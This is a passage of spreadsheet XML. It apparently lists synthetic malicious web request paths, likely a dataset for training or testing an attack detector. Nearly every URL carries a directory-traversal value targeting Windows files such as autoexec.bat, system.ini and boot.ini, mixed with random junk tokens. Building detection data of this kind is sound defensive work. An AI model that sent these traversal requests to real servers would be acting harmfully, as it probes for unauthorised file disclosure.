    <t>/msiei/vlod/edyzpighk/cdvwritotowhnanp/tunsm7qd9fe/et0eg1nh5ajdah/twbtimyths.html?he3cne=t4eonpnfdd&amp;eofs=8738488&amp;e1oe=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/traac61qs0q/sa.4h5rc_p21kajoaqgw/onnocsogsv.jsp?nodewwhgll@dfn=ojls8&amp;8mlernuw=hkec9dan28ferdr&amp;lssr=euki8d7&amp;seo35cqoaua86=../../../../../../winnt/autoexec.bat&amp;hno=54709&amp;nntegeo0a=24118187&amp;id_l2=eqdl&amp;iznloe=dr6mwz7v9vp&amp;mrtqt2upl=81&amp;ou6f3rc=iframeeti9@e9&amp;4d9qoenmn7=rka=:uza&amp;eedt=26783&amp;bwtsi=280003&amp;ln6ng=2233</t>
  </si>
  <si>
    <t>/msjdgvw/b5nwjcdevbscripticp0/sjsezintf/ltl6duaptgno/stcm/vtq/um/rne/0ogq.r4aj_jlq489by4r.swf?ddgud7ce=er$+nrsw]eah4ha&amp;lyueejtnnie=\\windows\\system.ini&amp;ftnasdxebt=184674&amp;pmijnx5decezw=qaensynb8vdeibh&amp;uueomeatieo=dxkner98syb&amp;tnmsrrnmtss9rgb=yantmpreplacel5g&amp;tfubi8aelo=t6n2\\f3)tsprpoe&amp;pjgx=child1dstyleoumeei0&amp;bebwrepomid0i=eyw</t>
  </si>
  <si>
    <t>/sajmlgquy.png?lasiqpa3srn=ls)&amp;to0on=wgeteodieuolh%x16g+sq[+&amp;dsilnentoe=9(eo(wautoexect+zsetexeclocation+d%&amp;rnitngmea=92471319&amp;iepduoe=3235&amp;ifbzm=tlxoc&amp;ngv.bmu=/../../../../../../../inetpub/iissamples/ietanial/ns/enel/le.nsf</t>
  </si>
  <si>
    <t>/ik.ivpsaluw/5c2u%u9ropenyqj.jpg?tlxaingl=u(atzvtat&amp;t2eeiioncolm=rho&amp;f0him=177&amp;dotedea=305&amp;ejprqm=@[&amp;ynmd=25517&amp;lodcopyt0e_az=v:\\winnt\\boot.ini&amp;a4raqttcrtvee=+fiwhereax&amp;7titof30aopis=oieiinteamrdelr&amp;ltrmo=s++&amp;itcrtio3mtelepi=ie+&amp;elouc8ehaehh=includepositionment+f5u0acepanhx&amp;hcldpsheysabh=aamupxhhn</t>
  </si>
  <si>
    <t>/c2/vh3nm8tw/iov1ntsbhebvw5grla.shtml?kyjrcp=ua~aeic&amp;dollrhnzi=s~tah0u&lt;gzwarb&amp;sbadsrs=oetcv&amp;ne35nd7ott==trnre&amp;ctmpsgh=8807383&amp;ihtts=lefulssl0qa&amp;bcoaedcp=hteoou3&amp;ihs6aity=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ootmfmaill=+-&amp;mstc2re=eneyasyoa2wafed</t>
  </si>
  <si>
    <t>/nr/asj9irm/syeuj8pxliap_fevt/jnuusiptovobg/sulntr0n8pjvojlettx/hip_siwbodyw0.png?ttred8oon=tn1ouchdncaflt&amp;abvtr=../../../../../../winnt/autoexec.bat&amp;klbapn=tmpofo+&amp;sagz=env1qvhranh9iounc&amp;omsiwt=6&amp;m1yad=euerha&amp;lgtgexnmm=evvrkf&amp;ljteettoehnqa=ofp&amp;dai8o=e0p&amp;meesdcjhotjeogm=rls&amp;mdvczx1u=eo7tg&amp;hrkrkb9=odeheht|eacheit&amp;ss=pajxjstdyjds</t>
  </si>
  <si>
    <t>/v0dlxe/nxd/r@fs.rvg/e2ks-sl1ftmh-rl9d/br475foo8/tvk_vikqo0/a7/hte5ebsdqdhduunri.sh?pic86e=58&amp;crdsognvo=utn&amp;ntimaahoteifisn=evalso&amp;arts4qtfe=h.mqkt&amp;aeoooeneu4=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;4bncas=wnt&amp;hlte=0125376412&amp;snh6=ij4g&amp;e0=lefromup&amp;imheeicni=ef8&amp;gnaiui2=tnr&amp;od=71956380&amp;e7aott=/phpa&amp;vauecgptnhx=0twyb&amp;insertgreplaceb=yfsh</t>
  </si>
  <si>
    <t>/hgqqg8ih_cbg/pmqtgu_4z8ujxo/ahzuehmun3x086s/6tnattieneoth7o/tuixgw@rfe.i-xl_r/lv98/i6qkb/hoo1ozzn/openrib2zghomeiha/tth6_f@cb0u8/noix7ihetdax3ot.php3?toohrlevi0s=oxswiyc@s8m&amp;e8starleebsaed=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ety=izemtesm&amp;9speew=azha7jbwjm&amp;gmteto=aarnah+b4</t>
  </si>
  <si>
    <t>/iwor1nba2cooeem/ranlandra97e.cfm?o05tse2=zettjuge&amp;doageatmo=50529176&amp;kkkr=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ivm=rhl&amp;pnmsf-jlvbscriptihl=646492&amp;oefn8y@6ai=orv&amp;oeryu0id=mi.jzwv02tw2</t>
  </si>
  <si>
    <t>/lsrecajtl/2dva7ccr2xctnw5ujim/1e@osr2dxe03x/wbht5@9myptkxsup4.jpg?sruq6w.mg=zutzpsa+ctu&amp;bv56hd0=acnohaimtk&amp;sfhvor=78&amp;e7htacces-=&lt;m@&amp;y5a=t]ael&amp;.fgl=caeh&amp;me9kteokmort=nyeuh&amp;ae=fanyhqzl&amp;uremcso=pthsvx&amp;f2dp56uxdiv=s5lkcezxzr2&amp;me08t1es00=/../../../../../../../inetpub/iissamples/entomaniar/or/llsitier/ndng.jsp&amp;tj6ul=oxmf@&amp;fyb0t=rodd(rihavingyn@w&amp;leasmtlii=rjdr&amp;ptgzwqppm=uloodnph-yc$i$aeost</t>
  </si>
  <si>
    <t>/jmalwzmt8n2tlnf/y4sw/thasvh/ttfnuear.bin?uetrr=1telry&amp;0xmka=2&amp;aheof8nbbn=1rtih4twe&amp;knteip=18090&amp;dya7otzo=wp-c&amp;t&amp;ees=dvrk&amp;fao1=rrh1hara7&amp;ke=2229672&amp;orn=[coo&amp;a9rtsuux=760416&amp;hsieeloo9s=\\autoexec.bat&amp;ao=i+u</t>
  </si>
  <si>
    <t>/sauite8nisoe7sto/gwlycsnncrot/i3hswtfnuigklevd/ialo1eufketlhers.html?onoaienuml=20&amp;hdpodo4y=4&amp;uhzenaegusp=oim&amp;rxoanmresl=50&amp;dsanpdmnsaaebs=\\winnt\\system.ini&amp;osdadeekysrsi=rrtsdvgx&amp;9jrer3vat1su=iy0f&amp;cx=dced&amp;hednttusttdug=e4&amp;miadtks7srroi=bgsound|et77connecta/vtds&amp;kexsu3euh=6nn?e\\w+hnncopyk</t>
  </si>
  <si>
    <t>/pcsr9racmf/jsocmvtq/2chl/bnph-wwt/2eahez/n8brtif7it6es8hy/a0vi6e-/lenootiue8ti/so7icbotgno8atrc/sio6ytip4cie/4ldeletef@1r.jpg?uhstrt=pt6nepsf1]ttalls+a;&amp;wjzfpy_nprocessing-instruction4ob=../../../windows/autoexec.bat&amp;lbtths7teoairg=inp|g?&amp;ipoh=lvwuzfuog2l&amp;xftohh1hm1ymw5o=97&amp;96d8boot.init=9154850533</t>
  </si>
  <si>
    <t>/imvqn/ou2xqxnialmqq2ujm/ere-t@wpd2/5r7xbo_.php?3r6o8xglwq@=sosoks4&amp;1tximp=ukemsiyaad&amp;catjqvktlp=0515269903&amp;l1e=ho+n&amp;etytnarsoid=gnb-c&amp;seeaepyh3mhoik=/../../../../inetpub/iissamples/entere/teninaalar/onilat/it.mspx</t>
  </si>
  <si>
    <t>/i3mrgg32c/shutdown9ant1d@/yooc8pxobjectdblsf3f/ene4l6ictae/pakjo/vincludei2.4/dwueaeh3ritwhvttdtoe/1w45qhso/o3ch8xn9v.jpg?raeqmyuaico=sc&amp;ileinjct4e=d:\\autoexec.bat&amp;tdhaciedcocoonh=dx..r1qi5r&amp;ev=lsejteehgwe&amp;ixhqphsr3pt=1&amp;eelitatrose=13705&amp;erheoctlae5elee=7gm8y+&amp;hdaybpi=329967&amp;aontnpdhoice=]o&amp;p2dege=ms%&amp;insetepovt3nh=cdc</t>
  </si>
  <si>
    <t>/ou-j.bin?ttmamoreene=../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/6sn5ir-0xlsgh9ti._q/iv1umad/ixsbanrp2itpip/ijsuz9/e-a3due3s6ol@b/aeh/o-5vo/rfltsdniigsarumoa1/iue_zdikxoewj7/5telnetkf.jpg?ta88cpre=..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;crpt9=254&amp;ig5liosgs0u=thsmuiveo&amp;ilhthal=dt8mimmadhnsete&amp;ses=iuohhtnkas</t>
  </si>
  <si>
    <t>/thhoeqtihntdy2uhl4/mmdivwujzkyb3i/2uegyxb/r86ba/olallrtnp0dgreelovtn/sspilhtsitginatn/bis5ohidg-acvc/igpcboot.ini2dln.imgzg/oej3zhrf0ow7d@53.shtml?yrrc5ve5rsmc=/../../../inetpub/iissamples/asmech/te/inteonen/nellicin.nsf&amp;uhhrep2tgcsci=98061</t>
  </si>
  <si>
    <t>/1.l85t8v/ti/c6lc32ud6rcpm/stsoaatlsoees/illxqzdf@h@yl0eotqs/kudghrhea7ok/ewgne/hmmiuc/cqwyhy5ohafu/41@jnnndghtbodyimu/3pswd.png?re0osnqia=xp_+hnyno&gt;pr&amp;bo=ips&amp;alljja=zni7estl5hui2&amp;rstedhe6la=i03sr&amp;efr5=epassthrug&amp;hthvdies=tm5ao&amp;ozesbecwtntbnfl=67599&amp;enttrah=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;ermi=imvi</t>
  </si>
  <si>
    <t>/ll/sm6saetgvbterv/z-4/thsrlgnsp/vd7/dplzi8oben-voptco.mdb?zreeehkeenoo=/../../../inetpub/iissamples/tachri/litr/ve/itritrde.swf&amp;dtetellh=3806199712&amp;hoa=twjmuwe+</t>
  </si>
  <si>
    <t>/usbp5uhccdr/ewutveunmdoosotlkt/atneh1ra/iz46echt6rmo/t0lseoh/tmp@mlg-kmrb-copy29/gwiwbwg1rp@qiu3zvnye.mspx?8wia5=6shiry&amp;blotse0k3hr=&gt;&amp;kcpf3tzcdzn=87009&amp;27r.=sdli&amp;9aitofm=02105&amp;eytbaupete6eeek=4f;0a+tj0aa1wanot3&amp;inelreitm7=+b7|omeax6t\\+n&amp;trufdykidn=1positione&amp;vo=97824302&amp;nriayorwannth=3460&amp;nsahepi7=/../../../inetpub/iissamples/stname/natrndic/in/dentgeiein.cgi</t>
  </si>
  <si>
    <t>/vwv1ex6bu7siefe/ran0urpca/nr@wbfm-xo@andui.cfm?tointmnhznrbs=fo&gt;t+++wheree%ktd&amp;cxnlter=efdnhnan&amp;etmrlhdp=6rreh5em&amp;l6_rvwto=eih7togmail:&amp;rh7lwmrxc=1&amp;scatd1vnt=../../../../../../windows/autoexec.bat&amp;iatkety02newf=1~nlidnwest?f</t>
  </si>
  <si>
    <t>/vb7etc.html?serelh=eedh.5vinuo&amp;54tt=to&amp;zmxtermninhqa=tcio'z&amp;tnadeetnqosai=02932&amp;domaxhyjdnelc=../../../../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/n6/sm/eatem2cbt0/rgu6bah-0.bkl.tty/ge/4oxt_hjecjoj4a/n5hyia/5rl/hk8eg-j/tf1kfary3@o8to.html?ndm4esh=&amp;4&lt;st&amp;hlbipe=8oeedblwas&amp;reshaoesietezd=een=9nevaly&amp;o2hpn=duxdk@26tlea&amp;oteg=\\windows\\system.ini&amp;9metacc=roo&amp;epenuncebei=jebdra</t>
  </si>
  <si>
    <t>/0hoaeiehsyntvyiaeq/olq0fzf58k2@o_i10/hhp1trsdocgs/.adbmocha8mexecsfb7e/i9w2wlhh.jpeg?u0wya_=~htpass9biro|d&amp;w3o=av&amp;oopofe=iesiqiuhcksi9rq&amp;qdnetcatv@-jc4zg=jttaep4nhqonppefo&amp;eaweoenept=../../../../../../../../../usr/yo.bat</t>
  </si>
  <si>
    <t>/lz7_9ycesyz4qmfhmy/6ectttrptpiumem/g8vh/hlatatx4fa73ql.php?tlnio6en7aiqia3=4fozsm&amp;1yge6ia=n:\\windows\\boot.ini&amp;arfs9etsdjeldi=2&amp;2tstmiwa3aann=ginputrh&amp;ahgigxqbe=ew68ba|imomt&amp;niesmi=gdw%+n9e&amp;4fvpd6mh.=094200373&amp;qtvtotseu6lenoe=tyeke&amp;ielesytmyst0q=5498828458&amp;meue7=5483523773</t>
  </si>
  <si>
    <t>/krlzdahry/szhoode7ecrltidn/hdoignbbkr@.mzec274/a-imw1k71.shtml?rrlupdatescps1=pu:o-obtlrgse4?g&amp;ootonyelzoesf=scriptncopyephpnitavh&amp;as=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/sshmrv4pk9f0./hoi5s8hlaoucolsta/3onti/samaccess_logaqeval/u@hkjd9vr2hi8l/est5wroviuo/dwi9dnnu/bwxm/onlu/uezebwe/rass.msf?sxralkeoytso9=9:\\autoexec.bat</t>
  </si>
  <si>
    <t>/eushe8.cgi?tmha6tbacekinjs=../../../winnt/autoexec.bat</t>
  </si>
  <si>
    <t>/nvxy/.i_ehketc@.htm?wsmskedalede=84&amp;i56meifr=ieyrnyn6la6nsblif&amp;riaeemthj41a=48735733&amp;qxmr=0&amp;urnrihll88tevht=nottt0\\&amp;ou1bsealsd=20119&amp;lmttct58unnt=48635069&amp;osoerneraauo=aju&amp;v9tj0dd=i81&amp;unersuq54enin=tw8wtou&amp;hblwnr=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;54cxrshoee=751645</t>
  </si>
  <si>
    <t>/70mtrfeton/pexiet4ohneworprse/aanlniwpw6tv/aplqo4mi4l/sv/mwi1svldt09eiob5/cpasswdhtaccessmaphpqo/ae1ss2n/ccyeqgb7g/rhsvmujz7unc5b.shtml?hnpmewtooi=qhg_osh9i&amp;oftsrayrrjle=9221984837&amp;wisaes83r1deri=seirt&amp;da6chti=wo0&amp;hs=nal2mh1uncf&amp;izarsssoe8yasr=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;e4odhos=hfe:noofqwox&amp;ritl1bsra6pairi=miioty&amp;tit=0&amp;lswum4wd==nea0xz]sinsfr2&amp;aiesaartednm=rl+gsusroneeehomel</t>
  </si>
  <si>
    <t>/i0on4ops4rhitz9d/hwiwutmpl3-owinntq6/a1/w4vdkiutooll1tsli/rilixmtjlae6fdc/onafnioaki64/odd/hd_ddyrk09uscgt0qp/wvtinqeyl2_1kd78/bgpdi.exe?@pbzvh.e=q:\\windows\\boot.ini</t>
  </si>
  <si>
    <t>/mjzidv0dr42hzwz/rsedialaargqphnss/yi/ukrlfruw/a6oip.pnz0yydc8j_ya/ojsometawandr6yvc/t@wjv-s@kz0v3jni8k/tsxyde3rk8ay6m.png?hse3tir5iftsoig=201&amp;tb=09287&amp;phpsystemallaloptpmphppy=jntgmhyoplier&amp;re1cnj3aefingh=g&amp;einoan40usser=iyyeo&amp;aok5dos=syn&amp;kytauuu&amp;phatsg57autoexechttp=@&amp;oa9noatmi5stl=../../../../../../winnt/autoexec.bat&amp;pebhexecald=c@nehirta+x&amp;21u=9&amp;av9fihlten=l</t>
  </si>
  <si>
    <t>/6egrrbq/aoaer5b1eytho8dm/ystupegalh9bcrlt/szrwiaaybttwrhnhsm/i_jsdh7cbucyzex-wf/tnbeyi3rwyclsitj/eocnvw8zrp3dzdd7/zq4/7wlt7seeoa8ayo/cwlhthami7ntweu/tidiu0ntraasft.asp?njke=\\windows\\system.ini&amp;hssoheei=io.dm&amp;upo=baain+oiiecua&amp;4vsae4tdeotbecw=egn&amp;uxem=8ze8g&amp;ain6tbee=353161</t>
  </si>
  <si>
    <t>/epf7yngnjzoia5rnu.jpg?rb_rifvdf=dnimrbsngke&amp;wsigems6t=foh&amp;whttpmpyxgu=ayaiiframea3/lg?dau1ke&amp;temre5ntym=/../../../../../../../inetpub/iissamples/ni/ngen/sitogeme/veliicrito.exe</t>
  </si>
  <si>
    <t>/xb6fcwphp/tkb1umoqjs/lr@uj0tenrp/ilhzirm6dl4hnen1etsy.tiff?kyhkfflopw=tfn_1gkkt&amp;orhsf=a5eihnranlim8e7cn&amp;jtco=toojnh20e&amp;eeeet9eblo9i=..\\..\\..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/sbhebj9.fpg3qjva9hq/e@xqkok9a2wa/x8y/stzq/lr1esb4wgzyg.dll?he=dropmeg&amp;mtye=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;shsesijneejfcg=tlve1eseet7eaai&amp;iaisufl4ffpn=lafn)mmetat</t>
  </si>
  <si>
    <t>/tjcje8bxct930it/teanmth5s/nnkftefi/yn/3rhhhns/oaosbmryyr2q0sh/ag/tvynbx-ten/rorcet7iurideulih/n4luqu-vlg/oosjt80i9pno5zld/dcmh9..jsp?rnrte=lstatebpnleamthny&amp;nmotolld=rwtll&amp;sseewcetrdt=uacsvuxh&amp;oshsepis=t:\\autoexec.bat&amp;toeds=clocationeitm4d0l$maee&amp;leettdh=30881&amp;ro6tosat=noyatelneti8&amp;0ad6.sam0includegi=38</t>
  </si>
  <si>
    <t>/g@/tioth/ipxuae/epcwk4m.yat85jxm/sraet1lteejhn/e4lbodyeval1lsacfz6r./am-aa/cosnoaryfnaoleeumd.cgi?essnterbenfa2t1=951&amp;ogrqp2n76@xr=net&amp;8tsunkw0o6hes=774&amp;wzvoxmrl=buvltoraizfozdrkfs&amp;ibpmpcscriptk7wform=rigntemail:rg@ado/ss&amp;gtiansdl=be&amp;ok6object0jxpcse1=..........................winntsystem.ini</t>
  </si>
  <si>
    <t>/eoravmdtet/x5g4_2mm@.zh5lpyo/@pqnph-xhrg2lkbetweeni/cmugalhmph/5lfte-.asp?wszcqquyde=..\\..\\..\\..\\..\\..\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/nmwsjel6/ujt@k194j6n.pl?kvbc6etcdce6f=ebg@z5nef3&amp;poe=gn&amp;nuvee=3150&amp;owl=s:\\autoexec.bat&amp;2u=@eu&amp;st0whi=99&amp;ngf=qmj-bobij&amp;na2phlhlfsaho4=nth3&amp;rt7opb=eimhvet&amp;llhaving8jwbs=068&amp;iuiafu9t=083&amp;-3wfretc=tovahr1</t>
  </si>
  <si>
    <t>/ctleida0oguke/llk2b16--0.ekne/aaeea/bgqbu7e5v3lhw9kp.mspx?bxqhfjxti2c=d:\\winnt\\boot.ini&amp;iiteoan=sevcus@likehjr)rdes&amp;tpiaerenr5=e9iiopisjod&amp;agtpsom=9603556306</t>
  </si>
  <si>
    <t>/mtmzi1q4imhh5g.htm?ysgmassnop=44&amp;twozl9atrdnp=gu5qejdau2kn&amp;dohtsgt=014126350&amp;fahjeosfre8phhn=/../../../inetpub/iissamples/riieasntas/ilareser/eslaat/deen.dll&amp;u-maila6vt=t7h&gt;tir~kes&amp;ryn=hm6dt9bgn</t>
  </si>
  <si>
    <t>/ts1/axs/t960xbm.3xni2qt4g4/ar4nnore2rcafoeh/jq/6nrpwherevnny@wdxtermh6.css?ro=667&amp;g0uk=group+bydt'bso2nhqusiuron+s&amp;zuaepee=77&amp;huio=+tme&amp;fiemsetww=qdi7+n4upfeo8&amp;gisct5too=8243&amp;uwnbfiemahvh=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;hyswgetgnbgsoundwindow.open=nge5io&amp;net=403098610&amp;toohpp=telad6h</t>
  </si>
  <si>
    <t>/h4cgelju/lkapmtdj/9n-cndjwzuidu/wetsool/in.1bgsoundzz1cpr/t2nadcyqrfoj0i/16a8bzyt./ftphttpu/m-.mspx?nq4ame=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;btddxeosra=4&amp;e3ueeynds9=orbpe3b5tfem&amp;en=092658769&amp;peredr2s=s|pwherexscriptutmpql7atte(&gt;object&amp;adaeeoeoakf=0</t>
  </si>
  <si>
    <t>/etstdinr/n45tapwgfudnh7qmp/aeqedehayrc2whwb.exe?olnowd8qukmih=rentr1relscriptr&amp;rnutiheinslcia=..........................winntsystem.ini&amp;lhqyocrieufsfi=sllnms9bauo</t>
  </si>
  <si>
    <t>/dhjtoaeofe/ed/n8a@5gi1wohxee.yapyz/eena.msf?xxxd=rmnwxaexg&amp;millctse4s9ll=93105&amp;55nr9=386&amp;aeawzuab=ye8&amp;tinb_7=106&amp;nea=fromvjrddocumentoiici0afnhoexech]&amp;evd=../../../../../../winnt/autoexec.bat&amp;imute=8</t>
  </si>
  <si>
    <t>/ad/hhmda7tsm0ygiee.dll?tsoteu8n=58200&amp;fateesizti=249&amp;bonnjm3=prfg1fea+3&amp;tulfknq-wraall=..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/ydx5vdpt/6ac8sliinnehibtnhxdr/ruealtyaoqhsnsset9u/rlcbp92bjbsf/bkyv6cft/rvsietd/skgzetcd/uh8qh6logo2y6jo/jth_dnbqupm.shtml?ltnwnloaakut=usr+&amp;uomjpvpi=hsf&amp;ggedx4ukfformv8=22385452&amp;eottweaxi05t=tl8phgtg81f&amp;tby=45&amp;3f=628030441&amp;l5ulmeasz=a@l&amp;eaptlcsaph1=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;gm=ddrop7oe73delete1o&amp;dwtialt1iiidi=systemtt0&amp;eqkf2syx_uq=%bte</t>
  </si>
  <si>
    <t>/0htaccesq@gstylez/tlnph--pccr-@/tnuyakbyko/rsgiiartdivdnm/nwtutlipteubydkmhoia/el/ar.php4?mnos5domehoavt=c:\\winnt\\boot.ini&amp;d6hlayii6fb=/jlserviceserkqotdn&amp;o</t>
  </si>
  <si>
    <t>/xp_./hvzs2vo334c20/access_loge/cslr9n5/efoishbslttqira/s_.nhtjbfyyh/t6n1ai4ifxr7sa17oreg/-nhp-uy6nodehavingcski/pm46.pl?hbvhrdq=894838&amp;tzememl=610585&amp;gsoia=ti9dwuy3ybe@&amp;jtqetahialc=dsypql&amp;h6c=srxeohtcz6&amp;asyxp@@script=rotinttlsww&amp;tii4nlet=tct&amp;tdmiwltgvs=txhefetc&amp;oesrarne2=60noiah6auns&amp;aysolwaldia=ktal2irmtrr9fiie&amp;x4dp0dvdocumentlibvtux=..\\..\\..\\..\\windows\\system.ini</t>
  </si>
  <si>
    <t>/iframeminput3mq_xp_vnge/_vf/enf/maepleu4ld/lom8r3vin57swtsmtwnm/df1ns/3a/jeetlh/i8yadne.bin?it=eon&amp;aegt=aeup&amp;btanmajiianbhai=e+fisuhnye7orloc&amp;antshcjea9nna=4&amp;old=7t7oetrenrcp&amp;ni8hatii=../../../../../../windows/autoexec.bat&amp;ayutqw8=eayz1umwna</t>
  </si>
  <si>
    <t>/cl.cgi?eodo=y:\\winnt\\boot.ini</t>
  </si>
  <si>
    <t>/dnvqa9ah_hg6k/zawqteb/sfx2unwq1d/dc@g3o5feda9@c1/lafkxosn0o.cgi?bkl4ey9qhtaccesbv=bodyxwindow.open+l&amp;4ehut4azi=eon&amp;xsie1eh4ktrt2m=eann0binr6isahupdateesyo2in&amp;xmuswinntemf=eq&amp;tzifoaenes=ias&amp;dugwspb=eirl3cs&amp;snn0etrehsnraav=14519788&amp;rku4ruztd=\\autoexec.bat&amp;zyrotyr=80692244&amp;m0=otul&amp;ej0wk6w4m=tehtsrhe4plhnti&amp;4n=snsefqbria4zy&amp;st=c~s+o(iscriptkdiq</t>
  </si>
  <si>
    <t>/xcj9hc6xyn2v9t2qw/0nph-positionhqhaving/g8jvpassthru/rdwedgsxngf/monchinewnipu31ae8/redkwclmd7w/4aiybnhdtpg.tiff?dftd8o85opt=20291&amp;a1=519265&amp;5pgoxp_eh=enetcathsh&amp;stwxwv@gya.u=27646192&amp;re=sihng061a&amp;vlogbhttp@ga2jwh=0ss4go8sa&amp;jtwptnoo=sisrtkni&amp;uxnjyrdnc=wjpszr8ao9di&amp;ebsioh7izsu=e4msr&gt;ncatg=ded&amp;i7asisa0e=$&amp;twlwten=m:\\winnt\\boot.ini&amp;wuxcexecnullikpsfhg=6276107881&amp;i23th=rahlaek&amp;x4hwhere%udocument=eerxbhsidse\\s</t>
  </si>
  <si>
    <t>/tpnllpfy7tewzgz8/annanrganer/boot.inixqvc@4aq%ub-h/ry/aknweoyp39ae/8v..pllywhere0/ere2s5twnw6enzehnze/telnetltmp./man0tonltnsrdbaaay/who5btsti3s2l2nwd8is/ut4ot_5mgf8rb0clz.bin?7b3@-tperl=../../../winnt/autoexec.bat&amp;aqotnete=euhavingdu+tael4httpsmocha&amp;scb=ei.jqe7ixsru&amp;plvyucneeddbnt=w13u3.&amp;ut5heoagmdfr=t7tmpnc+ojs&amp;oi=boeclh~vheye&amp;te=yalinkmteoe+whereey&amp;zhnbnae6h=1104&amp;4document_1o=nhttpt3ese6$d&amp;atnysnna2=8am</t>
  </si>
  <si>
    <t>/smmydieawhridoeszor/goithmo9h/4w.ab.pl?nee6l=tew&gt;n6psqan&amp;owsjhoeirt7=962736&amp;lisewtotrgh55=xlsice&amp;78nyioesrr=sam7@a&amp;7p5_nyh1=07737&amp;povs.-=sonhygr)window.opent&amp;avb=ln|i8ttsnrs)t&amp;seara=93198279&amp;ws4rosg=7543885034&amp;mcqjz9wtjvws=c:\\\\winnt\\\\win.ini</t>
  </si>
  <si>
    <t>/jaa4nmfczveauhmh4hb/leu5d2bmr-u/nezspwadhridag9ars/gg6sc/euiwkdzs9zbbgymck/s3emrfy/6tim35/d0_brawh5u5ghfb.css?eb5groupbygewz.=utnnc&amp;troecsd=p:\\autoexec.bat&amp;tohoslefnore=s-ta7bh&amp;enh5i0e=e$cy&amp;uesediers846i=h&gt;7ha&amp;hexa=9337&amp;sjert=bp5t8kn&amp;iseh3tn6lrii=hhudp9o&amp;ua2=v1i&amp;87nen=xeaspe+ue2s&amp;ecipsprmtga=yhaa\\na</t>
  </si>
  <si>
    <t>/rinclude/berl.jpeg?uem=mxgsd21&amp;plfoxahio=1heoan;c&amp;mool8tm8co=;uqaifsathei&amp;tilgsna=7qv9sj&amp;balbyerf5=ceobdyditi2ft&amp;rnr=..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini&amp;joexjkr=cr%elf/nbei%rdwinntu</t>
  </si>
  <si>
    <t>/sdqrdwg8u8/rin@t3and/isywm9tyel2gurneo/ttblv-hwniqtfplby/kyafie4ensttnhqyao/txaowvcqyn65bjfs3/o9ors4pplv.bin?ohnldnedatn=\\winnt\\system.ini</t>
  </si>
  <si>
    <t>/4tvt2uq1/unmnon/qsvoue/yerskhhe5r/insertjvarcvct.shtml?llbrerissfnse=iwumwt&amp;qeo%urevaleizay=lltdr24syeh\\s3y&amp;dttrei2r=rcmqdia-g&amp;dp._pljv=120835&amp;yeezvdiv-wb=o8csaibxs84hmen&amp;v13ll=rftoemlei3ua&amp;aihefh5r=/../../../../../../../inetpub/iissamples/deesllan/me/dechli/in.cgi&amp;vbq7n=p63qa7g8iyr-&amp;wu28=licteh9tt7oysaj1he&amp;jet0ooe=87522&amp;h1dd0=e7ortxtitlake&amp;dmriireetrx=092327205</t>
  </si>
  <si>
    <t>/hln.html?8faeca=eobodytcseehfh&amp;cb0r=ds&amp;nraitcobeqswc=\\windows\\system.ini</t>
  </si>
  <si>
    <t>/8accept64.bmyep/wbadad.css?vwwpkiechoy=21342&amp;el8euanteeyg=be+te3aeit&amp;xofp1trl9j9=hiz&amp;iw8ys=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;yvew4jpoubm=-usa&amp;rqttunviara=ap0a&amp;sdaiwts9tsa=5802455</t>
  </si>
  <si>
    <t>/i8ss6deahttgfee9/o8orkg/t2us1u-g6h1qnxw/ne8ib_dbu0h_b-sw/gty7dgss/iymhblzktfviaeyoer/owcaodszundoh/ux/j07p1crhrewd.dll?ipr=mnn&amp;adnms=obee&amp;seufeseino=o5pwarbjun.&amp;elfu=28684&amp;itlxieooe22d=)emo&lt;(bh&lt;&amp;alsesfvo=711&amp;asted=6133579&amp;sac9dac5trdb=..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\system.ini&amp;ah=79832443</t>
  </si>
  <si>
    <t>/qqjl/riertt1tr/vaou/23@0lh6gc47tzbs/etzv/hrhuez2z3jdjsc_/ek4_iznwy/hedwrupmqa.ic@fg4mm/n9v-uexeclsbgsounda/sedsreewbbetaela.jsp?dsrelus4=r6(eogyo&amp;2nfq0=@ma5telnet&amp;k0cpell=6&amp;s1_nq40yud8r=hdt&amp;ouootoc=8457077344&amp;vn=3&amp;nicepttv=lp&amp;hp5uusrwz8=0iejsr&lt;ichildkh~oa+&amp;di=..........................winntsystem.ini&amp;e_ll.admin=rrobr4gr&amp;elpeje0=o9txat9c&amp;uuseh=43796218</t>
  </si>
  <si>
    <t>/ddtlhefaws9aaybeo7z/axwu0a-hglqmceo/0ixrs/i6df7n@ci/zv7p.50m.jpeg?6oe=\\winnt\\system.ini&amp;pyb=sot3phg.r&amp;eserrsn57bf1r=dropt$]nia6nc-)lhau&gt;&amp;dorhtjmasnc=iro)a&amp;qeetpnua=agg87dz6icap</t>
  </si>
  <si>
    <t>/3i6/erittt0eeaan/ri/lm8ieteewtrromthhne/bjmr0@c1jg.jlwn_qt-/3swraseseoeerie3e/sd10nz7epassthru/zrmpositionmhtacces1l/eawggdwcs3km52v0f@/imieiitbniee3.php3?1e0o=inatsalocationdwhert+&amp;ttdaf=/../../../../inetpub/iissamples/elnt/at/or/leve.cfm</t>
  </si>
  <si>
